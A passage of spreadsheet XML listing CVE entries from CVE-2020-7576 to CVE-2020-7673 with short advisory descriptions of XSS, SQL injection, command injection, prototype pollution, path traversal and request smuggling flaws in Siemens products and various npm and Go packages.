    <t>A vulnerability has been identified in Climatix POL908 (BACnet/IP module) (All versions), Climatix POL909 (AWM module) (All versions &lt; V11.32). A persistent cross-site scripting (XSS) vulnerability exists in the web server access log page of the affected devices that could allow an attacker to inject arbitrary JavaScript code via specially crafted GET requests. The code could be potentially executed later by another (privileged) user. The security vulnerability could be exploited by an attacker with network access to the affected system. Successful exploitation requires no system privileges. An attacker could use the vulnerability to compromise the confidentiality and integrity of other users' web sessions.</t>
  </si>
  <si>
    <t>CVE-2020-7576</t>
  </si>
  <si>
    <t>A vulnerability has been identified in Camstar Enterprise Platform (All versions), Opcenter Execution Core (All versions &lt; V8.2), Opcenter Execution Core (V8.2). An authenticated user with the ability to create containers, packages or register defects could perform stored Cross-Site Scripting (XSS) attacks within the vulnerable software. The impact of this attack could result in the session cookies of legitimate users being stolen. Should the attacker gain access to these cookies, they could then hijack the session and perform arbitrary actions in the name of the victim.</t>
  </si>
  <si>
    <t>CVE-2020-7577</t>
  </si>
  <si>
    <t>A vulnerability has been identified in Camstar Enterprise Platform (All versions), Opcenter Execution Core (All versions &lt; V8.2). Through the use of several vulnerable fields of the application, an authenticated user could perform an SQL Injection attack by passing a modified SQL query downstream to the back-end server. The exploit of this vulnerability could be used to read, and potentially modify application data to which the user has access to.</t>
  </si>
  <si>
    <t>CVE-2020-7578</t>
  </si>
  <si>
    <t>A vulnerability has been identified in Camstar Enterprise Platform (All versions), Opcenter Execution Core (All versions &lt; V8.2). Authenticated users could have access to resources they normally would not have. This vulnerability could allow an attacker to view internal information and perform unauthorized changes.</t>
  </si>
  <si>
    <t>CVE-2020-7579</t>
  </si>
  <si>
    <t>A vulnerability has been identified in Spectrum Power™ 5 (All versions &lt; v5.50 HF02). The web server could allow Cross-Site Scripting (XSS) attacks if unsuspecting users are tricked into accessing a malicious link. User interaction is required for a successful exploitation. If deployed according to recommended system configuration, Siemens consideres the environmental vector as CR:L/IR:M/AR:H/MAV:A (4.1).</t>
  </si>
  <si>
    <t>CVE-2020-7580</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SIMATIC Automation Tool (All versions &lt; V4 SP2), SIMATIC NET PC Software V14 (All versions &lt; V14 SP1 Update 14), SIMATIC NET PC Software V15 (All versions), SIMATIC NET PC Software V16 (All versions &lt; V16 Upd3), SIMATIC PCS neo (All versions &lt; V3.0 SP1), SIMATIC ProSave (All versions &lt; V17), SIMATIC S7-1500 Software Controller (All versions &lt; V21.8), SIMATIC STEP 7 (All versions &lt; V5.6 SP2 HF3), SIMATIC STEP 7 (TIA Portal) V13 (All versions &lt; V13 SP2 Update 4), SIMATIC STEP 7 (TIA Portal) V14 (All versions &lt; V14 SP1 Update 10), SIMATIC STEP 7 (TIA Portal) V15 (All versions &lt; V15.1 Update 5), SIMATIC STEP 7 (TIA Portal) V16 (All versions &lt; V16 Update 2), SIMATIC WinCC OA V3.16 (All versions &lt; V3.16 P018), SIMATIC WinCC OA V3.17 (All versions &lt; V3.17 P003), SIMATIC WinCC Runtime Advanced (All versions &lt; V16 Update 2), SIMATIC WinCC Runtime Professional V13 (All versions &lt; V13 SP2 Update 4), SIMATIC WinCC Runtime Professional V14 (All versions &lt; V14 SP1 Update 10), SIMATIC WinCC Runtime Professional V15 (All versions &lt; V15.1 Update 5), SIMATIC WinCC Runtime Professional V16 (All versions &lt; V16 Update 2), SIMATIC WinCC V7.4 (All versions &lt; V7.4 SP1 Update 14), SIMATIC WinCC V7.5 (All versions &lt; V7.5 SP1 Update 3), SINAMICS STARTER (All Versions &lt; V5.4 HF2), SINAMICS Startdrive (All Versions &lt; V16 Update 3), SINEC NMS (All versions &lt; V1.0 SP2), SINEMA Server (All versions &lt; V14 SP3), SINUMERIK ONE virtual (All Versions &lt; V6.14), SINUMERIK Operate (All Versions &lt; V6.14). A component within the affected application regularly calls a helper binary with SYSTEM privileges while the call path is not quoted.</t>
  </si>
  <si>
    <t>CVE-2020-7581</t>
  </si>
  <si>
    <t>A vulnerability has been identified in Opcenter Execution Discrete (All versions &lt; V3.2), Opcenter Execution Foundation (All versions &lt; V3.2), Opcenter Execution Process (All versions &lt; V3.2), Opcenter Intelligence (All versions &lt; V3.3), Opcenter Quality (All versions &lt; V11.3), Opcenter RD&amp;L (V8.0), SIMATIC Notifier Server for Windows (All versions), SIMATIC PCS neo (All versions &lt; V3.0 SP1), SIMATIC STEP 7 (TIA Portal) V15 (All versions &lt; V15.1 Update 5), SIMATIC STEP 7 (TIA Portal) V16 (All versions &lt; V16 Update 2), SIMOCODE ES V15.1 (All versions &lt; V15.1 Update 4), SIMOCODE ES V16 (All versions &lt; V16 Update 1), Soft Starter ES V15.1 (All versions &lt; V15.1 Update 3), Soft Starter ES V16 (All versions &lt; V16 Update 1). A component within the affected application calls a helper binary with SYSTEM privileges during startup while the call path is not quoted. This could allow a local attacker with administrative privileges to execute code with SYSTEM level privileges.</t>
  </si>
  <si>
    <t>CVE-2020-7583</t>
  </si>
  <si>
    <t>A vulnerability has been identified in Automation License Manager 5 (All versions), Automation License Manager 6 (All versions &lt; V6.0.8). The application does not properly validate the users' privileges when executing some operations, which could allow a user with low permissions to arbitrary modify files that should be protected against writing.</t>
  </si>
  <si>
    <t>CVE-2020-7584</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SIMATIC S7-200 SMART CPU family (All versions &gt;= V2.2 &lt; V2.5.1). Affected devices do not properly handle large numbers of new incomming connections and could crash under certain circumstances. An attacker may leverage this to cause a Denial-of-Service situation.</t>
  </si>
  <si>
    <t>CVE-2020-7585</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SIMATIC PCS 7 V8.2 and earlier (All versions), SIMATIC PCS 7 V9.0 (All versions &lt; V9.0 SP3), SIMATIC PDM (All versions &lt; V9.2), SIMATIC STEP 7 V5.X (All versions &lt; V5.6 SP2 HF3), SINAMICS STARTER (containing STEP 7 OEM version) (All versions &lt; V5.4 HF2). A DLL Hijacking vulnerability could allow a local attacker to execute code with elevated privileges. The security vulnerability could be exploited by an attacker with local access to the affected systems. Successful exploitation requires user privileges but no user interaction. The vulnerability could allow an attacker to compromise the availability of the system as well as to have access to confidential information.</t>
  </si>
  <si>
    <t>CVE-2020-7586</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SIMATIC PCS 7 V8.2 and earlier (All versions), SIMATIC PCS 7 V9.0 (All versions &lt; V9.0 SP3), SIMATIC PDM (All versions &lt; V9.2), SIMATIC STEP 7 V5.X (All versions &lt; V5.6 SP2 HF3), SINAMICS STARTER (containing STEP 7 OEM version) (All versions &lt; V5.4 HF2). A buffer overflow vulnerability could allow a local attacker to cause a Denial-of-Service situation. The security vulnerability could be exploited by an attacker with local access to the affected systems. Successful exploitation requires user privileges but no user interaction. The vulnerability could allow an attacker to compromise the availability of the system as well as to have access to confidential information.</t>
  </si>
  <si>
    <t>CVE-2020-7587</t>
  </si>
  <si>
    <t>A vulnerability has been identified in Opcenter Execution Discrete (All versions &lt; V3.2), Opcenter Execution Foundation (All versions &lt; V3.2), Opcenter Execution Process (All versions &lt; V3.2), Opcenter Intelligence (All versions &lt; V3.3), Opcenter Quality (All versions &lt; V11.3), Opcenter RD&amp;L (V8.0), SIMATIC IT LMS (All versions &lt; V2.6), SIMATIC IT Production Suite (All versions &lt; V8.0), SIMATIC Notifier Server for Windows (All versions), SIMATIC PCS neo (All versions &lt; V3.0 SP1), SIMATIC STEP 7 (TIA Portal) V15 (All versions &lt; V15.1 Update 5), SIMATIC STEP 7 (TIA Portal) V16 (All versions &lt; V16 Update 2), SIMOCODE ES V15.1 (All versions &lt; V15.1 Update 4), SIMOCODE ES V16 (All versions &lt; V16 Update 1), Soft Starter ES V15.1 (All versions &lt; V15.1 Update 3), Soft Starter ES V16 (All versions &lt; V16 Update 1). Sending multiple specially crafted packets to the affected service could cause a partial remote denial-of-service, that would cause the service to restart itself. On some cases the vulnerability could leak random information from the remote service.</t>
  </si>
  <si>
    <t>CVE-2020-7588</t>
  </si>
  <si>
    <t>A vulnerability has been identified in Opcenter Execution Discrete (All versions &lt; V3.2), Opcenter Execution Foundation (All versions &lt; V3.2), Opcenter Execution Process (All versions &lt; V3.2), Opcenter Intelligence (All versions &lt; V3.3), Opcenter Quality (All versions &lt; V11.3), Opcenter RD&amp;L (V8.0), SIMATIC IT LMS (All versions &lt; V2.6), SIMATIC IT Production Suite (All versions &lt; V8.0), SIMATIC Notifier Server for Windows (All versions), SIMATIC PCS neo (All versions &lt; V3.0 SP1), SIMATIC STEP 7 (TIA Portal) V15 (All versions &lt; V15.1 Update 5), SIMATIC STEP 7 (TIA Portal) V16 (All versions &lt; V16 Update 2), SIMOCODE ES V15.1 (All versions &lt; V15.1 Update 4), SIMOCODE ES V16 (All versions &lt; V16 Update 1), Soft Starter ES V15.1 (All versions &lt; V15.1 Update 3), Soft Starter ES V16 (All versions &lt; V16 Update 1). Sending a specially crafted packet to the affected service could cause a partial remote denial-of-service, that would cause the service to restart itself.</t>
  </si>
  <si>
    <t>CVE-2020-7589</t>
  </si>
  <si>
    <t>A vulnerability has been identified in LOGO! 8 BM (incl. SIPLUS variants) (All versions). The vulnerability could lead to an attacker reading and modifying the device configuration and obtain project files from affected devices. The security vulnerability could be exploited by an unauthenticated attacker with network access to port 135/tcp. No user interaction is required to exploit this security vulnerability. The vulnerability impacts confidentiality, integrity, and availability of the device. At the time of advisory publication no public exploitation of this security vulnerability was known.</t>
  </si>
  <si>
    <t>CVE-2020-7590</t>
  </si>
  <si>
    <t>A vulnerability has been identified in DCA Vantage Analyzer (All versions &lt; V4.5 are affected by CVE-2020-7590. In addition, serial numbers &lt; 40000 running software V4.4.0 are also affected by CVE-2020-15797). Affected devices use a hard-coded password to protect the onboard database. This could allow an attacker to read and or modify the onboard database. Successful exploitation requires direct physical access to the device.</t>
  </si>
  <si>
    <t>259</t>
  </si>
  <si>
    <t>CVE-2020-7591</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SIPORT MP (All versions &lt; 3.2.1). Vulnerable versions of the device could allow an authenticated attacker to impersonate other users of the system and perform (potentially administrative) actions on behalf of those users if the single sign-on feature ("Allow logon without password") is enabled.</t>
  </si>
  <si>
    <t>603</t>
  </si>
  <si>
    <t>CVE-2020-7592</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SIMATIC HMI Basic Panels 1st Generation (incl. SIPLUS variants) (All versions), SIMATIC HMI Basic Panels 2nd Generation (incl. SIPLUS variants) (All versions), SIMATIC HMI Comfort Panels (incl. SIPLUS variants) (All versions), SIMATIC HMI KTP700F Mobile Arctic (All versions), SIMATIC HMI Mobile Panels 2nd Generation (All versions), SIMATIC WinCC Runtime Advanced (All versions). Unencrypted communication between the configuration software and the respective device could allow an attacker to capture potential plain text communication and have access to sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-7593</t>
  </si>
  <si>
    <t>A vulnerability has been identified in LOGO! 8 BM (incl. SIPLUS variants) (V1.81.01 - V1.81.03), LOGO! 8 BM (incl. SIPLUS variants) (V1.82.01), LOGO! 8 BM (incl. SIPLUS variants) (V1.82.02). A buffer overflow vulnerability exists in the Web Server functionality of the device. A remote unauthenticated attacker could send a specially crafted HTTP request to cause a memory corruption, potentially resulting in remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-7594</t>
  </si>
  <si>
    <t>MultiTech Conduit MTCDT-LVW2-24XX 1.4.17-ocea-13592 devices allow remote authenticated administrators to execute arbitrary OS commands by navigating to the Debug Options page and entering shell metacharacters in the interface JSON field of the ping function.</t>
  </si>
  <si>
    <t>CVE-2020-7595</t>
  </si>
  <si>
    <t>xmlStringLenDecodeEntities in parser.c in libxml2 2.9.10 has an infinite loop in a certain end-of-file situation.</t>
  </si>
  <si>
    <t>CVE-2020-7596</t>
  </si>
  <si>
    <t>Codecov npm module before 3.6.2 allows remote attackers to execute arbitrary commands via the "gcov-args" argument.</t>
  </si>
  <si>
    <t>CVE-2020-7597</t>
  </si>
  <si>
    <t>codecov-node npm module before 3.6.5 allows remote attackers to execute arbitrary commands.The value provided as part of the gcov-root argument is executed by the exec function within lib/codecov.js. This vulnerability exists due to an incomplete fix of CVE-2020-7596.</t>
  </si>
  <si>
    <t>CVE-2020-7598</t>
  </si>
  <si>
    <t>minimist before 1.2.2 could be tricked into adding or modifying properties of Object.prototype using a "constructor" or "__proto__" payload.</t>
  </si>
  <si>
    <t>CVE-2020-7599</t>
  </si>
  <si>
    <t>All versions of com.gradle.plugin-publish before 0.11.0 are vulnerable to Insertion of Sensitive Information into Log File. When a plugin author publishes a Gradle plugin while running Gradle with the --info log level flag, the Gradle Logger logs an AWS pre-signed URL. If this build log is publicly visible (as it is in many popular public CI systems like TravisCI) this AWS pre-signed URL would allow a malicious actor to replace a recently uploaded plugin with their own.</t>
  </si>
  <si>
    <t>CVE-2020-7600</t>
  </si>
  <si>
    <t>querymen prior to 2.1.4 allows modification of object properties. The parameters of exported function handler(type, name, fn) can be controlled by users without any sanitization. This could be abused for Prototype Pollution attacks.</t>
  </si>
  <si>
    <t>CVE-2020-7601</t>
  </si>
  <si>
    <t>gulp-scss-lint through 1.0.0 allows execution of arbitrary commands. It is possible to inject arbitrary commands to the "exec" function located in "src/command.js" via the provided options.</t>
  </si>
  <si>
    <t>CVE-2020-7602</t>
  </si>
  <si>
    <t>node-prompt-here through 1.0.1 allows execution of arbitrary commands. The "runCommand()" is called by "getDevices()" function in file "linux/manager.js", which is required by the "index. process.env.NM_CLI" in the file "linux/manager.js". This function is used to construct the argument of function "execSync()", which can be controlled by users without any sanitization.</t>
  </si>
  <si>
    <t>CVE-2020-7603</t>
  </si>
  <si>
    <t>closure-compiler-stream through 0.1.15 allows execution of arbitrary commands. The argument "options" of the exports function in "index.js" can be controlled by users without any sanitization.</t>
  </si>
  <si>
    <t>CVE-2020-7604</t>
  </si>
  <si>
    <t>pulverizr through 0.7.0 allows execution of arbitrary commands. Within "lib/job.js", the variable "filename" can be controlled by the attacker. This function uses the variable "filename" to construct the argument of the exec call without any sanitization. In order to successfully exploit this vulnerability, an attacker will need to create a new file with the same name as the attack command.</t>
  </si>
  <si>
    <t>CVE-2020-7605</t>
  </si>
  <si>
    <t>gulp-tape through 1.0.0 allows execution of arbitrary commands. It is possible to inject arbitrary commands as part of 'gulp-tape' options.</t>
  </si>
  <si>
    <t>CVE-2020-7606</t>
  </si>
  <si>
    <t>docker-compose-remote-api through 0.1.4 allows execution of arbitrary commands. Within 'index.js' of the package, the function 'exec(serviceName, cmd, fnStdout, fnStderr, fnExit)' uses the variable 'serviceName' which can be controlled by users without any sanitization.</t>
  </si>
  <si>
    <t>CVE-2020-7607</t>
  </si>
  <si>
    <t>gulp-styledocco through 0.0.3 allows execution of arbitrary commands. The argument 'options' of the exports function in 'index.js' can be controlled by users without any sanitization.</t>
  </si>
  <si>
    <t>CVE-2020-7608</t>
  </si>
  <si>
    <t>yargs-parser could be tricked into adding or modifying properties of Object.prototype using a "__proto__" payload.</t>
  </si>
  <si>
    <t>CVE-2020-7609</t>
  </si>
  <si>
    <t>node-rules including 3.0.0 and prior to 5.0.0 allows injection of arbitrary commands. The argument rules of function "fromJSON()" can be controlled by users without any sanitization.</t>
  </si>
  <si>
    <t>CVE-2020-7610</t>
  </si>
  <si>
    <t>All versions of bson before 1.1.4 are vulnerable to Deserialization of Untrusted Data. The package will ignore an unknown value for an object's _bsotype, leading to cases where an object is serialized as a document rather than the intended BSON type.</t>
  </si>
  <si>
    <t>CVE-2020-7611</t>
  </si>
  <si>
    <t>All versions of io.micronaut:micronaut-http-client before 1.2.11 and all versions from 1.3.0 before 1.3.2 are vulnerable to HTTP Request Header Injection due to not validating request headers passed to the client.</t>
  </si>
  <si>
    <t>CVE-2020-7613</t>
  </si>
  <si>
    <t>clamscan through 1.2.0 is vulnerable to Command Injection. It is possible to inject arbitrary commands as part of the `_is_clamav_binary` function located within `Index.js`. It should be noted that this vulnerability requires a pre-requisite that a folder should be created with the same command that will be chained to execute. This lowers the risk of this issue.</t>
  </si>
  <si>
    <t>CVE-2020-7614</t>
  </si>
  <si>
    <t>npm-programmatic through 0.0.12 is vulnerable to Command Injection.The packages and option properties are concatenated together without any validation and are used by the 'exec' function directly.</t>
  </si>
  <si>
    <t>CVE-2020-7615</t>
  </si>
  <si>
    <t>fsa through 0.5.1 is vulnerable to Command Injection. The first argument of 'execGitCommand()', located within 'lib/rep.js#63' can be controlled by users without any sanitization to inject arbitrary commands.</t>
  </si>
  <si>
    <t>CVE-2020-7616</t>
  </si>
  <si>
    <t>express-mock-middleware through 0.0.6 is vulnerable to Prototype Pollution. Exported functions by the package can be tricked into adding or modifying properties of the `Object.prototype`. Exploitation of this vulnerability requires creation of a new directory where an attack code can be placed which will then be exported by `express-mock-middleware`. As such, this is considered to be a low risk.</t>
  </si>
  <si>
    <t>CVE-2020-7617</t>
  </si>
  <si>
    <t>ini-parser through 0.0.2 is vulnerable to Prototype Pollution.The library could be tricked into adding or modifying properties of Object.prototype using a '__proto__' payload.</t>
  </si>
  <si>
    <t>CVE-2020-7618</t>
  </si>
  <si>
    <t>sds through 3.2.0 is vulnerable to Prototype Pollution.The library could be tricked into adding or modifying properties of the 'Object.prototype' by abusing the 'set' function located in 'js/set.js'.</t>
  </si>
  <si>
    <t>CVE-2020-7619</t>
  </si>
  <si>
    <t>get-git-data through 1.3.1 is vulnerable to Command Injection. It is possible to inject arbitrary commands as part of the arguments provided to get-git-data.</t>
  </si>
  <si>
    <t>CVE-2020-7620</t>
  </si>
  <si>
    <t>pomelo-monitor through 0.3.7 is vulnerable to Command Injection.It allows injection of arbitrary commands as part of 'pomelo-monitor' params.</t>
  </si>
  <si>
    <t>CVE-2020-7621</t>
  </si>
  <si>
    <t>strong-nginx-controller through 1.0.2 is vulnerable to Command Injection. It allows execution of arbitrary command as part of the '_nginxCmd()' function.</t>
  </si>
  <si>
    <t>CVE-2020-7622</t>
  </si>
  <si>
    <t>This affects the package io.jooby:jooby-netty before 1.6.9, from 2.0.0 and before 2.2.1. The DefaultHttpHeaders is set to false which means it does not validates that the header isn't being abused for HTTP Response Splitting.</t>
  </si>
  <si>
    <t>CVE-2020-7623</t>
  </si>
  <si>
    <t>jscover through 1.0.0 is vulnerable to Command Injection. It allows execution of arbitrary command via the source argument.</t>
  </si>
  <si>
    <t>CVE-2020-7624</t>
  </si>
  <si>
    <t>effect through 1.0.4 is vulnerable to Command Injection. It allows execution of arbitrary command via the options argument.</t>
  </si>
  <si>
    <t>CVE-2020-7625</t>
  </si>
  <si>
    <t>op-browser through 1.0.6 is vulnerable to Command Injection. It allows execution of arbitrary commands via the url function.</t>
  </si>
  <si>
    <t>CVE-2020-7626</t>
  </si>
  <si>
    <t>karma-mojo through 1.0.1 is vulnerable to Command Injection. It allows execution of arbitrary commands via the config argument.</t>
  </si>
  <si>
    <t>CVE-2020-7627</t>
  </si>
  <si>
    <t>node-key-sender through 1.0.11 is vulnerable to Command Injection. It allows execution of arbitrary commands via the 'arrParams' argument in the 'execute()' function.</t>
  </si>
  <si>
    <t>CVE-2020-7628</t>
  </si>
  <si>
    <t>umount through 1.1.6 is vulnerable to Command Injection. The argument device can be controlled by users without any sanitization.</t>
  </si>
  <si>
    <t>CVE-2020-7629</t>
  </si>
  <si>
    <t>install-package through 0.4.0 is vulnerable to Command Injection. It allows execution of arbitrary commands via the options argument.</t>
  </si>
  <si>
    <t>CVE-2020-7630</t>
  </si>
  <si>
    <t>git-add-remote through 1.0.0 is vulnerable to Command Injection. It allows execution of arbitrary commands via the name argument.</t>
  </si>
  <si>
    <t>CVE-2020-7631</t>
  </si>
  <si>
    <t>diskusage-ng through 0.2.4 is vulnerable to Command Injection.It allows execution of arbitrary commands via the path argument.</t>
  </si>
  <si>
    <t>CVE-2020-7632</t>
  </si>
  <si>
    <t>node-mpv through 1.4.3 is vulnerable to Command Injection. It allows execution of arbitrary commands via the options argument.</t>
  </si>
  <si>
    <t>CVE-2020-7633</t>
  </si>
  <si>
    <t>apiconnect-cli-plugins through 6.0.1 is vulnerable to Command Injection.It allows execution of arbitrary commands via the pluginUri argument.</t>
  </si>
  <si>
    <t>CVE-2020-7634</t>
  </si>
  <si>
    <t>heroku-addonpool through 0.1.15 is vulnerable to Command Injection.</t>
  </si>
  <si>
    <t>CVE-2020-7635</t>
  </si>
  <si>
    <t>compass-compile through 0.0.1 is vulnerable to Command Injection.It allows execution of arbitrary commands via tha options argument.</t>
  </si>
  <si>
    <t>CVE-2020-7636</t>
  </si>
  <si>
    <t>adb-driver through 0.1.8 is vulnerable to Command Injection.It allows execution of arbitrary commands via the command function.</t>
  </si>
  <si>
    <t>CVE-2020-7637</t>
  </si>
  <si>
    <t>class-transformer before 0.3.1 allow attackers to perform Prototype Pollution. The classToPlainFromExist function could be tricked into adding or modifying properties of Object.prototype using a __proto__ payload.</t>
  </si>
  <si>
    <t>CVE-2020-7638</t>
  </si>
  <si>
    <t>confinit through 0.3.0 is vulnerable to Prototype Pollution.The 'setDeepProperty' function could be tricked into adding or modifying properties of 'Object.prototype' using a '__proto__' payload.</t>
  </si>
  <si>
    <t>CVE-2020-7639</t>
  </si>
  <si>
    <t>eivindfjeldstad-dot below 1.0.3 is vulnerable to Prototype Pollution.The function 'set' could be tricked into adding or modifying properties of 'Object.prototype' using a '__proto__' payload.</t>
  </si>
  <si>
    <t>CVE-2020-7640</t>
  </si>
  <si>
    <t>pixl-class prior to 1.0.3 allows execution of arbitrary commands. The members argument of the create function can be controlled by users without any sanitization.</t>
  </si>
  <si>
    <t>CVE-2020-7641</t>
  </si>
  <si>
    <t>This affects all versions of package grunt-util-property. The function call could be tricked into adding or modifying properties of Object.prototype using a __proto__ payload.</t>
  </si>
  <si>
    <t>CVE-2020-7642</t>
  </si>
  <si>
    <t>lazysizes through 5.2.0 allows execution of malicious JavaScript. The following attributes are not sanitized by the video-embed plugin: data-vimeo, data-vimeoparams, data-youtube and data-ytparams which can be abused to inject malicious JavaScript.</t>
  </si>
  <si>
    <t>CVE-2020-7643</t>
  </si>
  <si>
    <t>paypal-adaptive through 0.4.2 manipulation of JavaScript objects resulting in Prototype Pollution. The PayPal function could be tricked into adding or modifying properties of Object.prototype using a __proto__ payload.</t>
  </si>
  <si>
    <t>CVE-2020-7644</t>
  </si>
  <si>
    <t>fun-map through 3.3.1 is vulnerable to Prototype Pollution. The function assocInM could be tricked into adding or modifying properties of 'Object.prototype' using a '__proto__' payload.</t>
  </si>
  <si>
    <t>CVE-2020-7645</t>
  </si>
  <si>
    <t>All versions of chrome-launcher allow execution of arbitrary commands, by controlling the $HOME environment variable in Linux operating systems.</t>
  </si>
  <si>
    <t>CVE-2020-7646</t>
  </si>
  <si>
    <t>curlrequest through 1.0.1 allows reading any file by populating the file parameter with user input.</t>
  </si>
  <si>
    <t>CVE-2020-7647</t>
  </si>
  <si>
    <t>All versions before 1.6.7 and all versions after 2.0.0 inclusive and before 2.8.2 of io.jooby:jooby and org.jooby:jooby are vulnerable to Directory Traversal via two separate vectors.</t>
  </si>
  <si>
    <t>CVE-2020-7648</t>
  </si>
  <si>
    <t>All versions of snyk-broker before 4.72.2 are vulnerable to Arbitrary File Read. It allows arbitrary file reads for users who have access to Snyk's internal network by appending the URL with a fragment identifier and a whitelisted path e.g. `#package.json`</t>
  </si>
  <si>
    <t>CVE-2020-7649</t>
  </si>
  <si>
    <t>This affects the package snyk-broker before 4.73.0. It allows arbitrary file reads for users with access to Snyk's internal network via directory traversal.</t>
  </si>
  <si>
    <t>CVE-2020-7650</t>
  </si>
  <si>
    <t>All versions of snyk-broker after 4.72.0 including and before 4.73.1 are vulnerable to Arbitrary File Read. It allows arbitrary file reads to users with access to Snyk's internal network of any files ending in the following extensions: yaml, yml or json.</t>
  </si>
  <si>
    <t>CVE-2020-7651</t>
  </si>
  <si>
    <t>All versions of snyk-broker before 4.79.0 are vulnerable to Arbitrary File Read. It allows partial file reads for users who have access to Snyk's internal network via patch history from GitHub Commits API.</t>
  </si>
  <si>
    <t>CVE-2020-7652</t>
  </si>
  <si>
    <t>All versions of snyk-broker before 4.80.0 are vulnerable to Arbitrary File Read. It allows arbitrary file reads for users with access to Snyk's internal network via directory traversal.</t>
  </si>
  <si>
    <t>CVE-2020-7653</t>
  </si>
  <si>
    <t>All versions of snyk-broker before 4.80.0 are vulnerable to Arbitrary File Read. It allows arbitrary file reads for users with access to Snyk's internal network by creating symlinks to match whitelisted paths.</t>
  </si>
  <si>
    <t>CVE-2020-7654</t>
  </si>
  <si>
    <t>All versions of snyk-broker before 4.73.1 are vulnerable to Information Exposure. It logs private keys if logging level is set to DEBUG.</t>
  </si>
  <si>
    <t>CVE-2020-7655</t>
  </si>
  <si>
    <t>netius prior to 1.17.58 is vulnerable to HTTP Request Smuggling. HTTP pipelining issues and request smuggling attacks might be possible due to incorrect Transfer encoding header parsing which could allow for CL:TE or TE:TE attacks.</t>
  </si>
  <si>
    <t>CVE-2020-7656</t>
  </si>
  <si>
    <t>jquery prior to 1.9.0 allows Cross-site Scripting attacks via the load method. The load method fails to recognize and remove "&lt;script&gt;" HTML tags that contain a whitespace character, i.e: "&lt;/script &gt;", which results in the enclosed script logic to be executed.</t>
  </si>
  <si>
    <t>CVE-2020-7658</t>
  </si>
  <si>
    <t>meinheld prior to 1.0.2 is vulnerable to HTTP Request Smuggling. HTTP pipelining issues and request smuggling attacks might be possible due to incorrect Content-Length and Transfer encoding header parsing.</t>
  </si>
  <si>
    <t>CVE-2020-7659</t>
  </si>
  <si>
    <t>reel through 0.6.1 allows Request Smuggling attacks due to incorrect Content-Length and Transfer encoding header parsing. It is possible to conduct HTTP request smuggling attacks by sending the Content-Length header twice. Furthermore, invalid Transfer Encoding headers were found to be parsed as valid which could be leveraged for TE:CL smuggling attacks. Note: This project is deprecated, and is not maintained any more.</t>
  </si>
  <si>
    <t>CVE-2020-7660</t>
  </si>
  <si>
    <t>serialize-javascript prior to 3.1.0 allows remote attackers to inject arbitrary code via the function "deleteFunctions" within "index.js".</t>
  </si>
  <si>
    <t>CVE-2020-7661</t>
  </si>
  <si>
    <t>all versions of url-regex are vulnerable to Regular Expression Denial of Service. An attacker providing a very long string in String.test can cause a Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2020-7662</t>
  </si>
  <si>
    <t>websocket-extensions npm module prior to 0.1.4 allows Denial of Service (DoS) via Regex Backtracking. The extension parser may take quadratic time when parsing a header containing an unclosed string parameter value whose content is a repeating two-byte sequence of a backslash and some other character. This could be abused by an attacker to conduct Regex Denial Of Service (ReDoS) on a single-threaded server by providing a malicious payload with the Sec-WebSocket-Extensions header.</t>
  </si>
  <si>
    <t>CVE-2020-7663</t>
  </si>
  <si>
    <t>websocket-extensions ruby module prior to 0.1.5 allows Denial of Service (DoS) via Regex Backtracking. The extension parser may take quadratic time when parsing a header containing an unclosed string parameter value whose content is a repeating two-byte sequence of a backslash and some other character. This could be abused by an attacker to conduct Regex Denial Of Service (ReDoS) on a single-threaded server by providing a malicious payload with the Sec-WebSocket-Extensions header.</t>
  </si>
  <si>
    <t>CVE-2020-7664</t>
  </si>
  <si>
    <t>In all versions of the package github.com/unknwon/cae/zip, the ExtractTo function doesn't securely escape file paths in zip archives which include leading or non-leading "..". This allows an attacker to add or replace files system-wide.</t>
  </si>
  <si>
    <t>CVE-2020-7665</t>
  </si>
  <si>
    <t>This affects all versions of package github.com/u-root/u-root/pkg/uzip. It is vulnerable to both leading and non-leading relative path traversal attacks in zip file extraction.</t>
  </si>
  <si>
    <t>CVE-2020-7666</t>
  </si>
  <si>
    <t>This affects all versions of package github.com/u-root/u-root/pkg/cpio. It is vulnerable to leading, non-leading relative path traversal attacks and symlink based (relative and absolute) path traversal attacks in cpio file extraction.</t>
  </si>
  <si>
    <t>CVE-2020-7667</t>
  </si>
  <si>
    <t>In package github.com/sassoftware/go-rpmutils/cpio before version 0.1.0, the CPIO extraction functionality doesn't sanitize the paths of the archived files for leading and non-leading ".." which leads in file extraction outside of the current directory. Note: the fixing commit was applied to all affected versions which were re-released.</t>
  </si>
  <si>
    <t>CVE-2020-7668</t>
  </si>
  <si>
    <t>In all versions of the package github.com/unknwon/cae/tz, the ExtractTo function doesn't securely escape file paths in zip archives which include leading or non-leading "..". This allows an attacker to add or replace files system-wide.</t>
  </si>
  <si>
    <t>CVE-2020-7669</t>
  </si>
  <si>
    <t>This affects all versions of package github.com/u-root/u-root/pkg/tarutil. It is vulnerable to both leading and non-leading relative path traversal attacks in tar file extraction.</t>
  </si>
  <si>
    <t>CVE-2020-7670</t>
  </si>
  <si>
    <t>agoo prior to 2.14.0 allows request smuggling attacks where agoo is used as a backend and a frontend proxy also being vulnerable. HTTP pipelining issues and request smuggling attacks might be possible due to incorrect Content-Length and Transfer encoding header parsing. It is possible to conduct HTTP request smuggling attacks where `agoo` is used as part of a chain of backend servers due to insufficient `Content-Length` and `Transfer Encoding` parsing.</t>
  </si>
  <si>
    <t>CVE-2020-7671</t>
  </si>
  <si>
    <t>goliath through 1.0.6 allows request smuggling attacks where goliath is used as a backend and a frontend proxy also being vulnerable. It is possible to conduct HTTP request smuggling attacks by sending the Content-Length header twice. Furthermore, invalid Transfer Encoding headers were found to be parsed as valid which could be leveraged for TE:CL smuggling attacks.</t>
  </si>
  <si>
    <t>CVE-2020-7672</t>
  </si>
  <si>
    <t>mosc through 1.0.0 is vulnerable to Arbitrary Code Execution. User input provided to `properties` argument is executed by the `eval` function, resulting in code execution.</t>
  </si>
  <si>
    <t>CVE-2020-7673</t>
  </si>
  <si>
    <t>node-extend through 0.2.0 is vulnerable to Arbitrary Code Execution. User input provided to the argument `A` of `extend` function`(A,B,as,isAargs)` located within `lib/extend.js` is executed by the `eval` function, resulting in code execution.</t>
  </si>
  <si>
